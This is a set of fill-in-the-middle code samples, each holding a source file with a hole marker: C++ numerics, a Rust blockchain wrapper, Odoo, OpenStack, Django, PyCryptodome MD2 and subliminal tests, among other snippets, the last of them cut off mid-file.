_dmd_<T, storage, storage_out1, storage_out1>(invals, evecs, evals, nullptr, energy);
}
template<class T, int storage, int storage_out1, int storage_out2>
inline void dmd(const dmat<T, storage>& invals,
dmat<T, storage_out1>& evecs, dvec<T>& evals, dmat<T, storage_out2>& pod_dat,
double energy){
_dmd_(invals, evecs, evals, &pod_dat, energy);<|fim▁hole|>inline matrix pod(const matrix& invals, double energy=1){
Eigen::JacobiSVD<matrix>
svd(invals.rightCols(invals.cols()-1),Eigen::ComputeThinU);
//from Tu, theory and application of DMD, we can use the thin models
//(rank of input determines SVD dimensions)
const auto& sing_vals = svd.singularValues();
//assumes `energy` is the fraction of total squared singular-value energy to keep
double ener = energy * sing_vals.squaredNorm();
decltype(svd.nonzeroSingularValues()) num_keep=0;
double ener_cum_sum=0;
while(ener_cum_sum < ener){
ener_cum_sum += sing_vals[num_keep]*sing_vals[num_keep];
num_keep++;
if(num_keep >= svd.nonzeroSingularValues()){
break;
}
}
return svd.matrixU().leftCols(num_keep);
}
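//example usage (sketch; X holds one snapshot per column):
//  dmat<double, Eigen::ColMajor> modes; dvec<double> eigs;
//  dmd(X, modes, eigs, 0.99); //keep modes capturing 99% of the SVD energy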
#endif<|fim▁end|> | }
template<class matrix> |
<|file_name|>call_chain.rs<|end_file_name|><|fim▁begin|>// CITA
// Copyright 2016-2017 Cryptape Technologies LLC.
// This program is free software: you can redistribute it
// and/or modify it under the terms of the GNU General Public
// License as published by the Free Software Foundation,
// either version 3 of the License, or (at your option) any
// later version.
// This program is distributed in the hope that it will be
// useful, but WITHOUT ANY WARRANTY; without even the implied
// warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
// PURPOSE. See the GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with this program. If not, see <http://www.gnu.org/licenses/>.
use common_types::receipt::LocalizedReceipt;
use core::libchain::Genesis;
use core::libchain::chain::*;
use std::sync::Arc;
use std::sync::mpsc::Sender;<|fim▁hole|>#[allow(unused_variables, dead_code)]
#[derive(Clone)]
pub struct Callchain {
chain: Arc<Chain>,
}
#[allow(unused_variables, dead_code)]
impl Callchain {
pub fn new(db: Arc<KeyValueDB>, genesis: Genesis, sync_sender: Sender<u64>) -> Self {
let (chain, st) = Chain::init_chain(db, genesis, sync_sender);
Callchain { chain: chain }
}
pub fn add_block(&self, block: Block) {
self.chain.set_block(block);
}
pub fn get_height(&self) -> u64 {
self.chain.get_current_height()
}
pub fn get_pre_hash(&self) -> H256 {
*self.chain.current_hash.read()
}
pub fn get_contract_address(&self, hash: H256) -> H160 {
let receipt = self.chain.localized_receipt(hash).unwrap();
match receipt.contract_address {
Some(contract_address) => contract_address,
None => panic!("contract_address error"),
}
}
pub fn get_receipt(&self, hash: H256) -> LocalizedReceipt {
self.chain.localized_receipt(hash).unwrap()
}
}<|fim▁end|> | use util::{H256, H160};
use util::KeyValueDB;
|
<|file_name|>test_prototype_module_export.py<|end_file_name|><|fim▁begin|># #############################################################################
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2010 - 2014 Savoir-faire Linux
# (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#<|fim▁hole|>from odoo.tests import common
class TestPrototypeModuleExport(common.TransactionCase):
def setUp(self):
super(TestPrototypeModuleExport, self).setUp()
self.main_model = self.env["module_prototyper.module.export"]
self.prototype_model = self.env["module_prototyper"]
self.module_category_model = self.env["ir.module.category"]
self.prototype = self.prototype_model.create(
{
"name": "t_name",
"category_id": self.module_category_model.browse(1).id,
"human_name": "t_human_name",
"summary": "t_summary",
"description": "t_description",
"author": "t_author",
"maintainer": "t_maintainer",
"website": "t_website",
}
)
self.exporter = self.main_model.create({"name": "t_name"})
def test_action_export_assert_for_wrong_active_model(self):
"""Test if the assertion raises."""
exporter = self.main_model.with_context(active_model="t_active_model").create(
{}
)
self.assertRaises(AssertionError, exporter.action_export)
def test_action_export_update_wizard(self):
"""Test if the wizard is updated during the process."""
exporter = self.main_model.with_context(
active_model=self.prototype_model._name,
active_id=self.prototype.id,
).create({})
exporter.action_export()
self.assertEqual(exporter.state, "get")
self.assertEqual(exporter.name, "{}.zip".format(self.prototype.name))
def test_zip_files_returns_tuple(self):
"""Test the method return of the method that generate the zip file."""
ret = self.main_model.zip_files(self.exporter, [self.prototype])
self.assertIsInstance(ret, tuple)
self.assertIsInstance(ret.zip_file, zipfile.ZipFile)
self.assertIsInstance(ret.BytesIO, io.BytesIO)<|fim▁end|> | ##############################################################################
import io
import zipfile
|
<|file_name|>test_clientmanager.py<|end_file_name|><|fim▁begin|># Copyright 2012-2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from openstackclient.common import clientmanager
from openstackclient.tests import utils
class Container(object):
attr = clientmanager.ClientCache(lambda x: object())
def __init__(self):
pass
class TestClientManager(utils.TestCase):
def setUp(self):
super(TestClientManager, self).setUp()<|fim▁hole|> # NOTE(dtroyer): Verify that the ClientCache descriptor only invokes
# the factory one time and always returns the same value after that.
c = Container()
self.assertEqual(c.attr, c.attr)<|fim▁end|> |
def test_singleton(self): |
<|file_name|>SessionDocumentModel.js<|end_file_name|><|fim▁begin|>import {observable} from 'mobx';
export default class SessionDocumentModel {
@observable id;
@observable sessionID;
@observable studentID;
@observable filename;<|fim▁hole|> @observable CreatorId;
@observable archived;
constructor(value) {
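// initialize the observables from the plain record passed in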
this.id = value.id;
this.sessionID = value.sessionID;
this.studentID = value.studentID;
this.filename = value.filename;
this.CreatorId = value.CreatorId;
this.archived = value.archived;
}
}<|fim▁end|> | |
<|file_name|>ccScmStatus.ts<|end_file_name|><|fim▁begin|><|fim▁hole|>export const enum ccScmStatus {
MODIFIED = 1,
UNTRACKED = 2
}<|fim▁end|> | |
<|file_name|>permissions.py<|end_file_name|><|fim▁begin|>from rest_framework.permissions import BasePermission, SAFE_METHODS
class IsOwnerOrReadOnly(BasePermission):
"""<|fim▁hole|>
"""
def has_object_permission(self, request, view, obj):
return request.method in SAFE_METHODS or view.get_stream().owner == request.user<|fim▁end|> | Check if request is safe or authenticated user is owner. |
<|file_name|>ftl_util.py<|end_file_name|><|fim▁begin|># Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This package defines helpful utilities for FTL ."""
import os
import time
import logging
import subprocess
import tempfile
import datetime
import json
from ftl.common import constants
from ftl.common import ftl_error
from containerregistry.client.v2_2 import append
from containerregistry.transform.v2_2 import metadata
class FTLException(Exception):
pass
def AppendLayersIntoImage(imgs):
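# Stitches single-layer images into one image, carrying each layer's
# diff ID and the config-file-derived overrides along.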
with Timing('Stitching layers into final image'):
for i, img in enumerate(imgs):
if i == 0:
result_image = img
continue
diff_ids = img.diff_ids()
for diff_id in diff_ids:
lyr = img.blob(img._diff_id_to_digest(diff_id))
overrides = CfgDctToOverrides(json.loads(img.config_file()))
result_image = append.Layer(
result_image, lyr, diff_id=diff_id, overrides=overrides)
return result_image
# This is a 'whitelist' of values to pass from the
# config_file of a DockerImage to an Overrides object
# _OVERRIDES_VALUES = ['created', 'Entrypoint', 'Env']
def CfgDctToOverrides(config_dct):
"""
Takes a dct of config values and runs them through
the whitelist
"""
overrides_dct = {}
for k, v in config_dct.iteritems():
if k == 'created':
# this key change is made as the key is
# 'creation_time' in an Overrides object
# but 'created' in the config_file
overrides_dct['creation_time'] = v
for k, v in config_dct['config'].iteritems():
if k == 'Entrypoint':
# this key change is made as the key is
# 'entrypoint' in an Overrides object
# but 'Entrypoint' in the config_file
overrides_dct['entrypoint'] = v
elif k == 'Env':
# this key change is made as the key is
# 'env' in an Overrides object
# but 'Env' in the config_file
overrides_dct['env'] = v
elif k == 'ExposedPorts':
# this key change is made as the key is
# 'ports' in an Overrides object
# but 'ExposedPorts' in the config_file
overrides_dct['ports'] = v
return metadata.Overrides(**overrides_dct)
class Timing(object):
def __init__(self, descriptor):
logging.info("starting: %s" % descriptor)
self.descriptor = descriptor
def __enter__(self):
self.start = time.time()
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
end = time.time()
logging.info('%s took %d seconds', self.descriptor, end - self.start)
def zip_dir_to_layer_sha(pkg_dir):
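# Tars pkg_dir and returns (gzipped layer bytes, uncompressed tar bytes).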
tar_path = tempfile.mktemp(suffix='.tar')
with Timing('tar_runtime_package'):
subprocess.check_call(['tar', '-C', pkg_dir, '-cf', tar_path, '.'])
u_blob = open(tar_path, 'r').read()
# We use gzip for performance instead of python's zip.
with Timing('gzip_runtime_tar'):
subprocess.check_call(['gzip', tar_path, '-1'])
return open(os.path.join(pkg_dir, tar_path + '.gz'), 'rb').read(), u_blob
def has_pkg_descriptor(descriptor_files, ctx):
for f in descriptor_files:
if ctx.Contains(f):
return True
return False
def descriptor_parser(descriptor_files, ctx):
descriptor = None
for f in descriptor_files:
if ctx.Contains(f):
descriptor = f
descriptor_contents = ctx.GetFile(descriptor)
break
if not descriptor:
logging.info("No package descriptor found. No packages installed.")
return None
return descriptor_contents
def descriptor_copy(ctx, descriptor_files, app_dir):
for f in descriptor_files:
if ctx.Contains(f):
with open(os.path.join(app_dir, f), 'w') as w:
w.write(ctx.GetFile(f))
def gen_tmp_dir(dirr):
tmp_dir = tempfile.mkdtemp()
dir_name = os.path.join(tmp_dir, dirr)
os.mkdir(dir_name)
return dir_name
def creation_time(image):
logging.info(image.config_file())
cfg = json.loads(image.config_file())
return cfg.get('created')
def timestamp_to_time(dt_str):
dt = dt_str.rstrip('Z')
return datetime.datetime.strptime(dt, "%Y-%m-%dT%H:%M:%S")
def generate_overrides(set_env, venv_dir=constants.VENV_DIR):
overrides_dct = {
'created': str(datetime.date.today()) + 'T00:00:00Z',
}
if set_env:
env = {
'VIRTUAL_ENV': venv_dir,
}
path_dir = os.path.join(venv_dir, "bin")
env['PATH'] = '%s:$PATH' % path_dir
overrides_dct['env'] = env
return overrides_dct
def parseCacheLogEntry(entry):
"""
This takes an FTL log entry and parses out relevant caching information
It returns a map with the information parsed from the entry
Example entry (truncated for line length):
INFO [CACHE][MISS] v1:PYTHON:click:==6.7->f1ea...
Return value for this entry:
{
"key_version": "v1",
"language": "python",
"phase": 2,
"package": "click",
"version": "6.7",
"key": "f1ea...",
"hit": True
}
"""
if "->" not in entry or "[CACHE]" not in entry:
logging.warn("cannot parse non-cache log entry %s" % entry)
return None
entry = entry.rstrip("\n").lstrip("INFO").lstrip(" ").lstrip("[CACHE]")
hit = True if entry.startswith("[HIT]") else False
entry = entry.lstrip("[HIT]").lstrip("[MISS]").lstrip(" ")
parts = entry.split("->")[0]
key = entry.split("->")[1]
parts = parts.split(":")
if len(parts) == 2:
# phase 1 entry
return {
"key_version": parts[0],
"language": parts[1],<|fim▁hole|> }
else:
# phase 2 entry
return {
"key_version": parts[0],
"language": parts[1],
"phase": 2,
"package": parts[2],
"version": parts[3],
"key": key,
"hit": hit
}
def run_command(cmd_name,
cmd_args,
cmd_cwd=None,
cmd_env=None,
cmd_input=None,
err_type=ftl_error.FTLErrors.INTERNAL()):
with Timing(cmd_name):
logging.info("`%s` full cmd:\n%s" % (cmd_name, " ".join(cmd_args)))
proc_pipe = None
proc_pipe = subprocess.Popen(
cmd_args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=cmd_cwd,
env=cmd_env,
)
stdout, stderr = proc_pipe.communicate(input=cmd_input)
logging.info("`%s` stdout:\n%s" % (cmd_name, stdout))
err_txt = ""
if stderr:
err_txt = "`%s` had error output:\n%s" % (cmd_name, stderr)
logging.error(err_txt)
if proc_pipe.returncode:
ret_txt = "error: `%s` returned code: %d" % (cmd_name,
proc_pipe.returncode)
logging.error(ret_txt)
if err_type == ftl_error.FTLErrors.USER():
raise ftl_error.UserError("%s\n%s" % (err_txt, ret_txt))
elif err_type == ftl_error.FTLErrors.INTERNAL():
raise ftl_error.InternalError("%s\n%s" % (err_txt, ret_txt))
else:
raise Exception("Unknown error type passed to run_command")<|fim▁end|> | "phase": 1,
"key": key,
"hit": hit |
<|file_name|>WindowsInputService.cpp<|end_file_name|><|fim▁begin|>#ifdef WINDOWS_PLATFORM
#include "WindowsInputService.hpp"
#include "WindowsMouseInterface.hpp"
#include "WindowsKeyboardInterface.hpp"
namespace MPACK
{
namespace Input
{
WindowsInputService::WindowsInputService()
{
m_pMouse = new WindowsMouseInterface;
m_pKeyboard = new WindowsKeyboardInterface;
Reset();
}
WindowsInputService::~WindowsInputService()
{
// the service owns the platform interfaces allocated in the constructor
delete m_pMouse;
delete m_pKeyboard;
}
void WindowsInputService::Update()
{
m_pMouse->Update();
m_pKeyboard->Update();
}
void WindowsInputService::Reset()
{
m_pMouse->Reset();
m_pKeyboard->Reset();
}
MouseInterface* WindowsInputService::GetMouse() const
{
return m_pMouse;
}
KeyboardInterface* WindowsInputService::GetKeyboard() const
{
return m_pKeyboard;
}<|fim▁hole|><|fim▁end|> | }
}
#endif |
<|file_name|>backends.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
from django.core.mail.backends.base import BaseEmailBackend
from django.core.mail.message import sanitize_address
from django.conf import settings
import requests
import logging
logger = logging.getLogger(__name__)
class Newsletter2GoEmailBackend(BaseEmailBackend):
n2g_api_endpoint = 'https://www.newsletter2go.de/de/api/send/email/'<|fim▁hole|>
def send_messages(self, emails):
"""
Sends one or more EmailMessage objects and returns the number of email
messages sent.
"""
if not emails:
return 0
num_sent = 0
for email in emails:
if not email.recipients():
continue
from_email = sanitize_address(email.from_email, email.encoding)
recipients = [sanitize_address(addr, email.encoding)
for addr in email.recipients()]
logger.debug('Sending email from {0} to {1}'.format(from_email, ', '.join(recipients)))
for recipient in recipients:
payload = {
'key': settings.NEWSLETTER2GO_API_KEY,
'to': recipient,
'from': from_email,
'subject': email.subject,
}
payload['html' if email.content_subtype == 'html' else 'text'] = email.body
response = requests.post(self.n2g_api_endpoint, payload)
response_json = response.json()
if response_json.get('status') == 200:
num_sent += 1
return num_sent<|fim▁end|> | |
<|file_name|>32.d.ts<|end_file_name|><|fim▁begin|><|fim▁hole|>
export = ServiceDesk32;<|fim▁end|> | import { ServiceDesk32 } from "../../"; |
<|file_name|>ICMS.java<|end_file_name|><|fim▁begin|>package br.com.caelum.designpatterns.decorator.imposto;
import br.com.caelum.designpatterns.modelo.Orcamento;
public class ICMS extends Imposto{
public ICMS(Imposto outroImposto) {
super(outroImposto);
}
public ICMS() {
}
public double calcula(Orcamento orcamento){
return orcamento.getValor() * 0.1 + calculoDoOutroImposto(orcamento);
}<|fim▁hole|><|fim▁end|> | } |
<|file_name|>FillHeapLocalMethodOnStack.java<|end_file_name|><|fim▁begin|>package com.dev9.crash.bad;
import com.dev9.crash.AbstractBadThing;
import org.springframework.stereotype.Service;
@Service
public class FillHeapLocalMethodOnStack extends AbstractBadThing {
public String getBadThingDescription() {
return "Fills up the heap using an object with a local method. This method allocates an object on the stack which grows until OOM.";
}
public String getBadThingName() {<|fim▁hole|> @Override
public String getBadThingId() {
return "fill-up-the-heap-object-local-method-stack-oom";
}
public String doBadThing() throws Exception {
MemoryMasher mm = new MemoryMasher();
mm.stackHeapMasher();
return null;
}
}<|fim▁end|> | return "Fill Up The Heap On The Stack";
}
|
<|file_name|>test.rs<|end_file_name|><|fim▁begin|>//-----------------------------------------------------------------------
//
// mod parser::atom TEST
//
//-----------------------------------------------------------------------
use super::Status;
use super::{parse_dot, parse_eof, parse_literal, parse_match, MatchRules};
#[test]
fn test_parse_literal_ok() {
let rules = rules!{};
let status_init = Status::init("aaaaaaaaaaaaaaaa", &rules);
let (status_end, _) = parse_literal(status_init, "aaa").ok().unwrap();
assert!(status_end.pos.col == 3);
assert!(status_end.pos.n == 3);
assert!(status_end.pos.row == 0);
}
#[test]
fn test_parse_literal_ok2() {
let rules = rules!{};
let status_init = Status::init("abcdefghij", &rules);
let (status_end, _) = parse_literal(status_init, "abc").ok().unwrap();
assert_eq!(status_end.pos.col, 3);
assert_eq!(status_end.pos.n, 3);<|fim▁hole|>}
#[test]
fn test_parse_literal_fail() {
let rules = rules!{};
let status_init = Status::init("abcdefghij", &rules);
assert!(parse_literal(status_init, "bbb").is_err());
}
#[test]
fn test_parse_literal_fail2() {
let rules = rules!{};
let status_init = Status::init("abcdefghij", &rules);
assert!(parse_literal(status_init, "abd").is_err());
}
#[test]
fn test_parse_literal_fail_short_text2parse() {
let rules = rules!{};
let status_init = Status::init("abcd", &rules);
assert!(parse_literal(status_init, "abcdefghij").is_err());
}
#[test]
fn test_parse_literal_with_new_line() {
let rules = rules!{};
let status_init = Status::init(
"aa
aaaaaaaaaaaaaa",
&rules,
);
let (status_end, _) = parse_literal(
status_init,
"aa
a",
).ok()
.unwrap();
assert!(status_end.pos.col == 1);
assert!(status_end.pos.row == 1);
}
#[test]
fn test_parse_dot() {
let rules = rules!{};
let status = Status::init("ab", &rules);
let (status, _) = parse_dot(status).ok().unwrap();
assert!(status.pos.col == 1);
assert!(status.pos.n == 1);
assert!(status.pos.row == 0);
let (status, _) = parse_dot(status).ok().unwrap();
assert!(status.pos.col == 2);
assert!(status.pos.n == 2);
assert!(status.pos.row == 0);
assert!(parse_dot(status).is_err());
}
#[test]
fn test_parse_match_ok() {
let rules = rules!{};
let status = Status::init("a f0ghi", &rules);
let match_rules = MatchRules::new().with_chars("54321ed_cba");
let (status, _) = parse_match(status, &match_rules).ok().unwrap();
assert_eq!(status.pos.col, 1);
assert_eq!(status.pos.n, 1);
assert_eq!(status.pos.row, 0);
let (status, _) = parse_dot(status).ok().unwrap();
let match_rules = MatchRules::new().with_bound_chars(vec![('f', 'g'), ('h', 'j')]);
let (status, _) = parse_match(status, &match_rules).ok().unwrap();
assert_eq!(status.pos.col, 3);
assert_eq!(status.pos.n, 3);
assert_eq!(status.pos.row, 0);
assert!(parse_match(status, &match_rules).is_err());
}
#[test]
fn test_parse_match_err() {
let rules = rules!{};
let status = Status::init("a9", &rules);
let match_rules = MatchRules::new().with_chars("ed_cba");
let (status, _) = parse_match(status, &match_rules).ok().unwrap();
assert_eq!(status.pos.col, 1);
assert_eq!(status.pos.n, 1);
assert_eq!(status.pos.row, 0);
let match_rules = MatchRules::new().with_bound_chars(vec![('a', 'z'), ('0', '8')]);
assert!(parse_match(status, &match_rules).is_err());
}
#[test]
fn test_parse_match_eof_ok() {
let rules = rules!{};
let status = Status::init("a", &rules);
let match_rules = MatchRules::new().with_bound_chars(vec![('a', 'z'), ('0', '9')]);
let (status, _) = parse_match(status, &match_rules).ok().unwrap();
assert!(parse_eof(status).is_ok());
}
#[test]
fn test_parse_match_eof_error() {
let rules = rules!{};
let status = Status::init("ab", &rules);
let match_rules = MatchRules::new().with_bound_chars(vec![('a', 'z'), ('0', '9')]);
let (status, _) = parse_match(status, &match_rules).ok().unwrap();
assert!(parse_eof(status).is_err());
}<|fim▁end|> | assert_eq!(status_end.pos.row, 0); |
<|file_name|>MD2.py<|end_file_name|><|fim▁begin|># ===================================================================
#
# Copyright (c) 2014, Legrandin <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ===================================================================
from Cryptodome.Util.py3compat import bord
from Cryptodome.Util._raw_api import (load_pycryptodome_raw_lib,
VoidPointer, SmartPointer,
create_string_buffer,
get_raw_buffer, c_size_t,
c_uint8_ptr)
_raw_md2_lib = load_pycryptodome_raw_lib(
"Cryptodome.Hash._MD2",
"""
int md2_init(void **shaState);
int md2_destroy(void *shaState);
int md2_update(void *hs,
const uint8_t *buf,
size_t len);
int md2_digest(const void *shaState,
uint8_t digest[20]);
int md2_copy(const void *src, void *dst);
""")
class MD2Hash(object):
"""An MD2 hash object.
Do not instantiate directly. Use the :func:`new` function.
:ivar oid: ASN.1 Object ID
:vartype oid: string
:ivar block_size: the size in bytes of the internal message block,
input to the compression function
:vartype block_size: integer
:ivar digest_size: the size in bytes of the resulting hash
:vartype digest_size: integer
"""
# The size of the resulting hash in bytes.
digest_size = 16
# The internal block size of the hash algorithm in bytes.
block_size = 64
# ASN.1 Object ID
oid = "1.2.840.113549.2.2"
def __init__(self, data=None):
state = VoidPointer()
result = _raw_md2_lib.md2_init(state.address_of())
if result:
raise ValueError("Error %d while instantiating MD2"
% result)
self._state = SmartPointer(state.get(),
_raw_md2_lib.md2_destroy)
if data:
self.update(data)
def update(self, data):
"""Continue hashing of a message by consuming the next chunk of data.
Args:
data (byte string/byte array/memoryview): The next chunk of the message being hashed.
"""
result = _raw_md2_lib.md2_update(self._state.get(),<|fim▁hole|> % result)
def digest(self):
"""Return the **binary** (non-printable) digest of the message that has been hashed so far.
:return: The hash digest, computed over the data processed so far.
Binary form.
:rtype: byte string
"""
bfr = create_string_buffer(self.digest_size)
result = _raw_md2_lib.md2_digest(self._state.get(),
bfr)
if result:
raise ValueError("Error %d while instantiating MD2"
% result)
return get_raw_buffer(bfr)
def hexdigest(self):
"""Return the **printable** digest of the message that has been hashed so far.
:return: The hash digest, computed over the data processed so far.
Hexadecimal encoded.
:rtype: string
"""
return "".join(["%02x" % bord(x) for x in self.digest()])
def copy(self):
"""Return a copy ("clone") of the hash object.
The copy will have the same internal state as the original hash
object.
This can be used to efficiently compute the digests of strings that
share a common initial substring.
:return: A hash object of the same type
"""
clone = MD2Hash()
result = _raw_md2_lib.md2_copy(self._state.get(),
clone._state.get())
if result:
raise ValueError("Error %d while copying MD2" % result)
return clone
def new(self, data=None):
return MD2Hash(data)
def new(data=None):
"""Create a new hash object.
:parameter data:
Optional. The very first chunk of the message to hash.
It is equivalent to an early call to :meth:`MD2Hash.update`.
:type data: byte string/byte array/memoryview
:Return: A :class:`MD2Hash` hash object
"""
return MD2Hash().new(data)
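# Example (sketch):
#   h = new(b'message')
#   print(h.hexdigest())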
# The size of the resulting hash in bytes.
digest_size = MD2Hash.digest_size
# The internal block size of the hash algorithm in bytes.
block_size = MD2Hash.block_size<|fim▁end|> | c_uint8_ptr(data),
c_size_t(len(data)))
if result:
raise ValueError("Error %d while instantiating MD2" |
<|file_name|>meta.py<|end_file_name|><|fim▁begin|><|fim▁hole|>
from pybrain.rl.learners.learner import Learner
class MetaLearner(Learner):
""" Learners that make use of other Learners, or learn how to learn. """<|fim▁end|> | __author__ = 'Tom Schaul, [email protected]' |
<|file_name|>admin.py<|end_file_name|><|fim▁begin|>from django.contrib import admin
from django_revision.modeladmin_mixin import ModelAdminRevisionMixin
from edc_base.modeladmin_mixins import (
ModelAdminNextUrlRedirectMixin, ModelAdminFormInstructionsMixin,
ModelAdminFormAutoNumberMixin,
ModelAdminReadOnlyMixin, ModelAdminAuditFieldsMixin)
from .admin_site import edc_map_admin
from .forms import ContainerForm, InnerContainerForm
from .models import Container, InnerContainer
class ModelAdminMixin(ModelAdminFormInstructionsMixin,
ModelAdminNextUrlRedirectMixin,
ModelAdminFormAutoNumberMixin,
ModelAdminRevisionMixin,
ModelAdminAuditFieldsMixin,
ModelAdminReadOnlyMixin,
admin.ModelAdmin):
list_per_page = 10
date_hierarchy = 'modified'
empty_value_display = '-'
@admin.register(Container, site=edc_map_admin)
class ContainerAdmin(ModelAdminMixin):
form = ContainerForm
list_per_page = 10
list_display = ('name', 'map_area', 'created', 'modified')
list_filter = (
'created',
'modified',
'map_area',
'hostname_modified')
search_fields = ('map_area', 'id')
<|fim▁hole|>class InnerContainerAdmin(ModelAdminMixin):
form = InnerContainerForm
list_per_page = 10
list_display = ('map_area', 'device_id', 'name', 'created', 'modified')
list_filter = (
'created',
'modified',
'map_area',
'container__name',
'name',
'hostname_modified')
search_fields = ('device_id', 'name', 'id')<|fim▁end|> |
@admin.register(InnerContainer, site=edc_map_admin) |
<|file_name|>test_subliminal.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import shutil
from unittest import TestCase, TestSuite, TestLoader, TextTestRunner
from babelfish import Language
from subliminal import list_subtitles, download_subtitles, save_subtitles, download_best_subtitles, scan_video
from subliminal.tests.common import MOVIES, EPISODES
TEST_DIR = 'test_data'
class ApiTestCase(TestCase):
def setUp(self):
os.mkdir(TEST_DIR)
def tearDown(self):
shutil.rmtree(TEST_DIR)
def test_list_subtitles_movie_0(self):
videos = [MOVIES[0]]
languages = {Language('eng')}
subtitles = list_subtitles(videos, languages)
self.assertEqual(len(subtitles), len(videos))
self.assertGreater(len(subtitles[videos[0]]), 0)
def test_list_subtitles_movie_0_por_br(self):<|fim▁hole|> self.assertGreater(len(subtitles[videos[0]]), 0)
def test_list_subtitles_episodes(self):
videos = [EPISODES[0], EPISODES[1]]
languages = {Language('eng'), Language('fra')}
subtitles = list_subtitles(videos, languages)
self.assertEqual(len(subtitles), len(videos))
self.assertGreater(len(subtitles[videos[0]]), 0)
def test_download_subtitles(self):
videos = [EPISODES[0]]
for video in videos:
video.name = os.path.join(TEST_DIR, os.path.split(video.name)[1])
languages = {Language('eng')}
subtitles = list_subtitles(videos, languages)
download_subtitles(subtitles[videos[0]][:5])
self.assertGreaterEqual(len([s for s in subtitles[videos[0]] if s.content is not None]), 4)
def test_download_best_subtitles(self):
videos = [EPISODES[0], EPISODES[1]]
for video in videos:
video.name = os.path.join(TEST_DIR, os.path.split(video.name)[1])
languages = {Language('eng'), Language('fra')}
subtitles = download_best_subtitles(videos, languages)
for video in videos:
self.assertIn(video, subtitles)
self.assertEqual(len(subtitles[video]), 2)
def test_save_subtitles(self):
videos = [EPISODES[0], EPISODES[1]]
for video in videos:
video.name = os.path.join(TEST_DIR, os.path.split(video.name)[1])
languages = {Language('eng'), Language('fra')}
subtitles = list_subtitles(videos, languages)
# make a list of subtitles to download (one per language per video)
subtitles_to_download = []
for video, video_subtitles in subtitles.items():
video_subtitle_languages = set()
for video_subtitle in video_subtitles:
if video_subtitle.language in video_subtitle_languages:
continue
subtitles_to_download.append(video_subtitle)
video_subtitle_languages.add(video_subtitle.language)
if video_subtitle_languages == languages:
break
self.assertEqual(len(subtitles_to_download), 4)
# download
download_subtitles(subtitles_to_download)
save_subtitles(subtitles)
for video in videos:
self.assertTrue(os.path.exists(os.path.splitext(video.name)[0] + '.en.srt'))
self.assertTrue(os.path.exists(os.path.splitext(video.name)[0] + '.fr.srt'))
def test_save_subtitles_single(self):
videos = [EPISODES[0], EPISODES[1]]
for video in videos:
video.name = os.path.join(TEST_DIR, os.path.split(video.name)[1])
languages = {Language('eng'), Language('fra')}
subtitles = download_best_subtitles(videos, languages)
save_subtitles(subtitles, single=True)
for video in videos:
self.assertIn(video, subtitles)
self.assertEqual(len(subtitles[video]), 2)
self.assertTrue(os.path.exists(os.path.splitext(video.name)[0] + '.srt'))
def test_download_best_subtitles_min_score(self):
videos = [MOVIES[0]]
for video in videos:
video.name = os.path.join(TEST_DIR, os.path.split(video.name)[1])
languages = {Language('eng'), Language('fra')}
subtitles = download_best_subtitles(videos, languages, min_score=1000)
self.assertEqual(len(subtitles), 0)
def test_download_best_subtitles_hearing_impaired(self):
videos = [MOVIES[0]]
for video in videos:
video.name = os.path.join(TEST_DIR, os.path.split(video.name)[1])
languages = {Language('eng')}
subtitles = download_best_subtitles(videos, languages, hearing_impaired=True)
self.assertTrue(subtitles[videos[0]][0].hearing_impaired)
class VideoTestCase(TestCase):
def setUp(self):
os.mkdir(TEST_DIR)
for video in MOVIES + EPISODES:
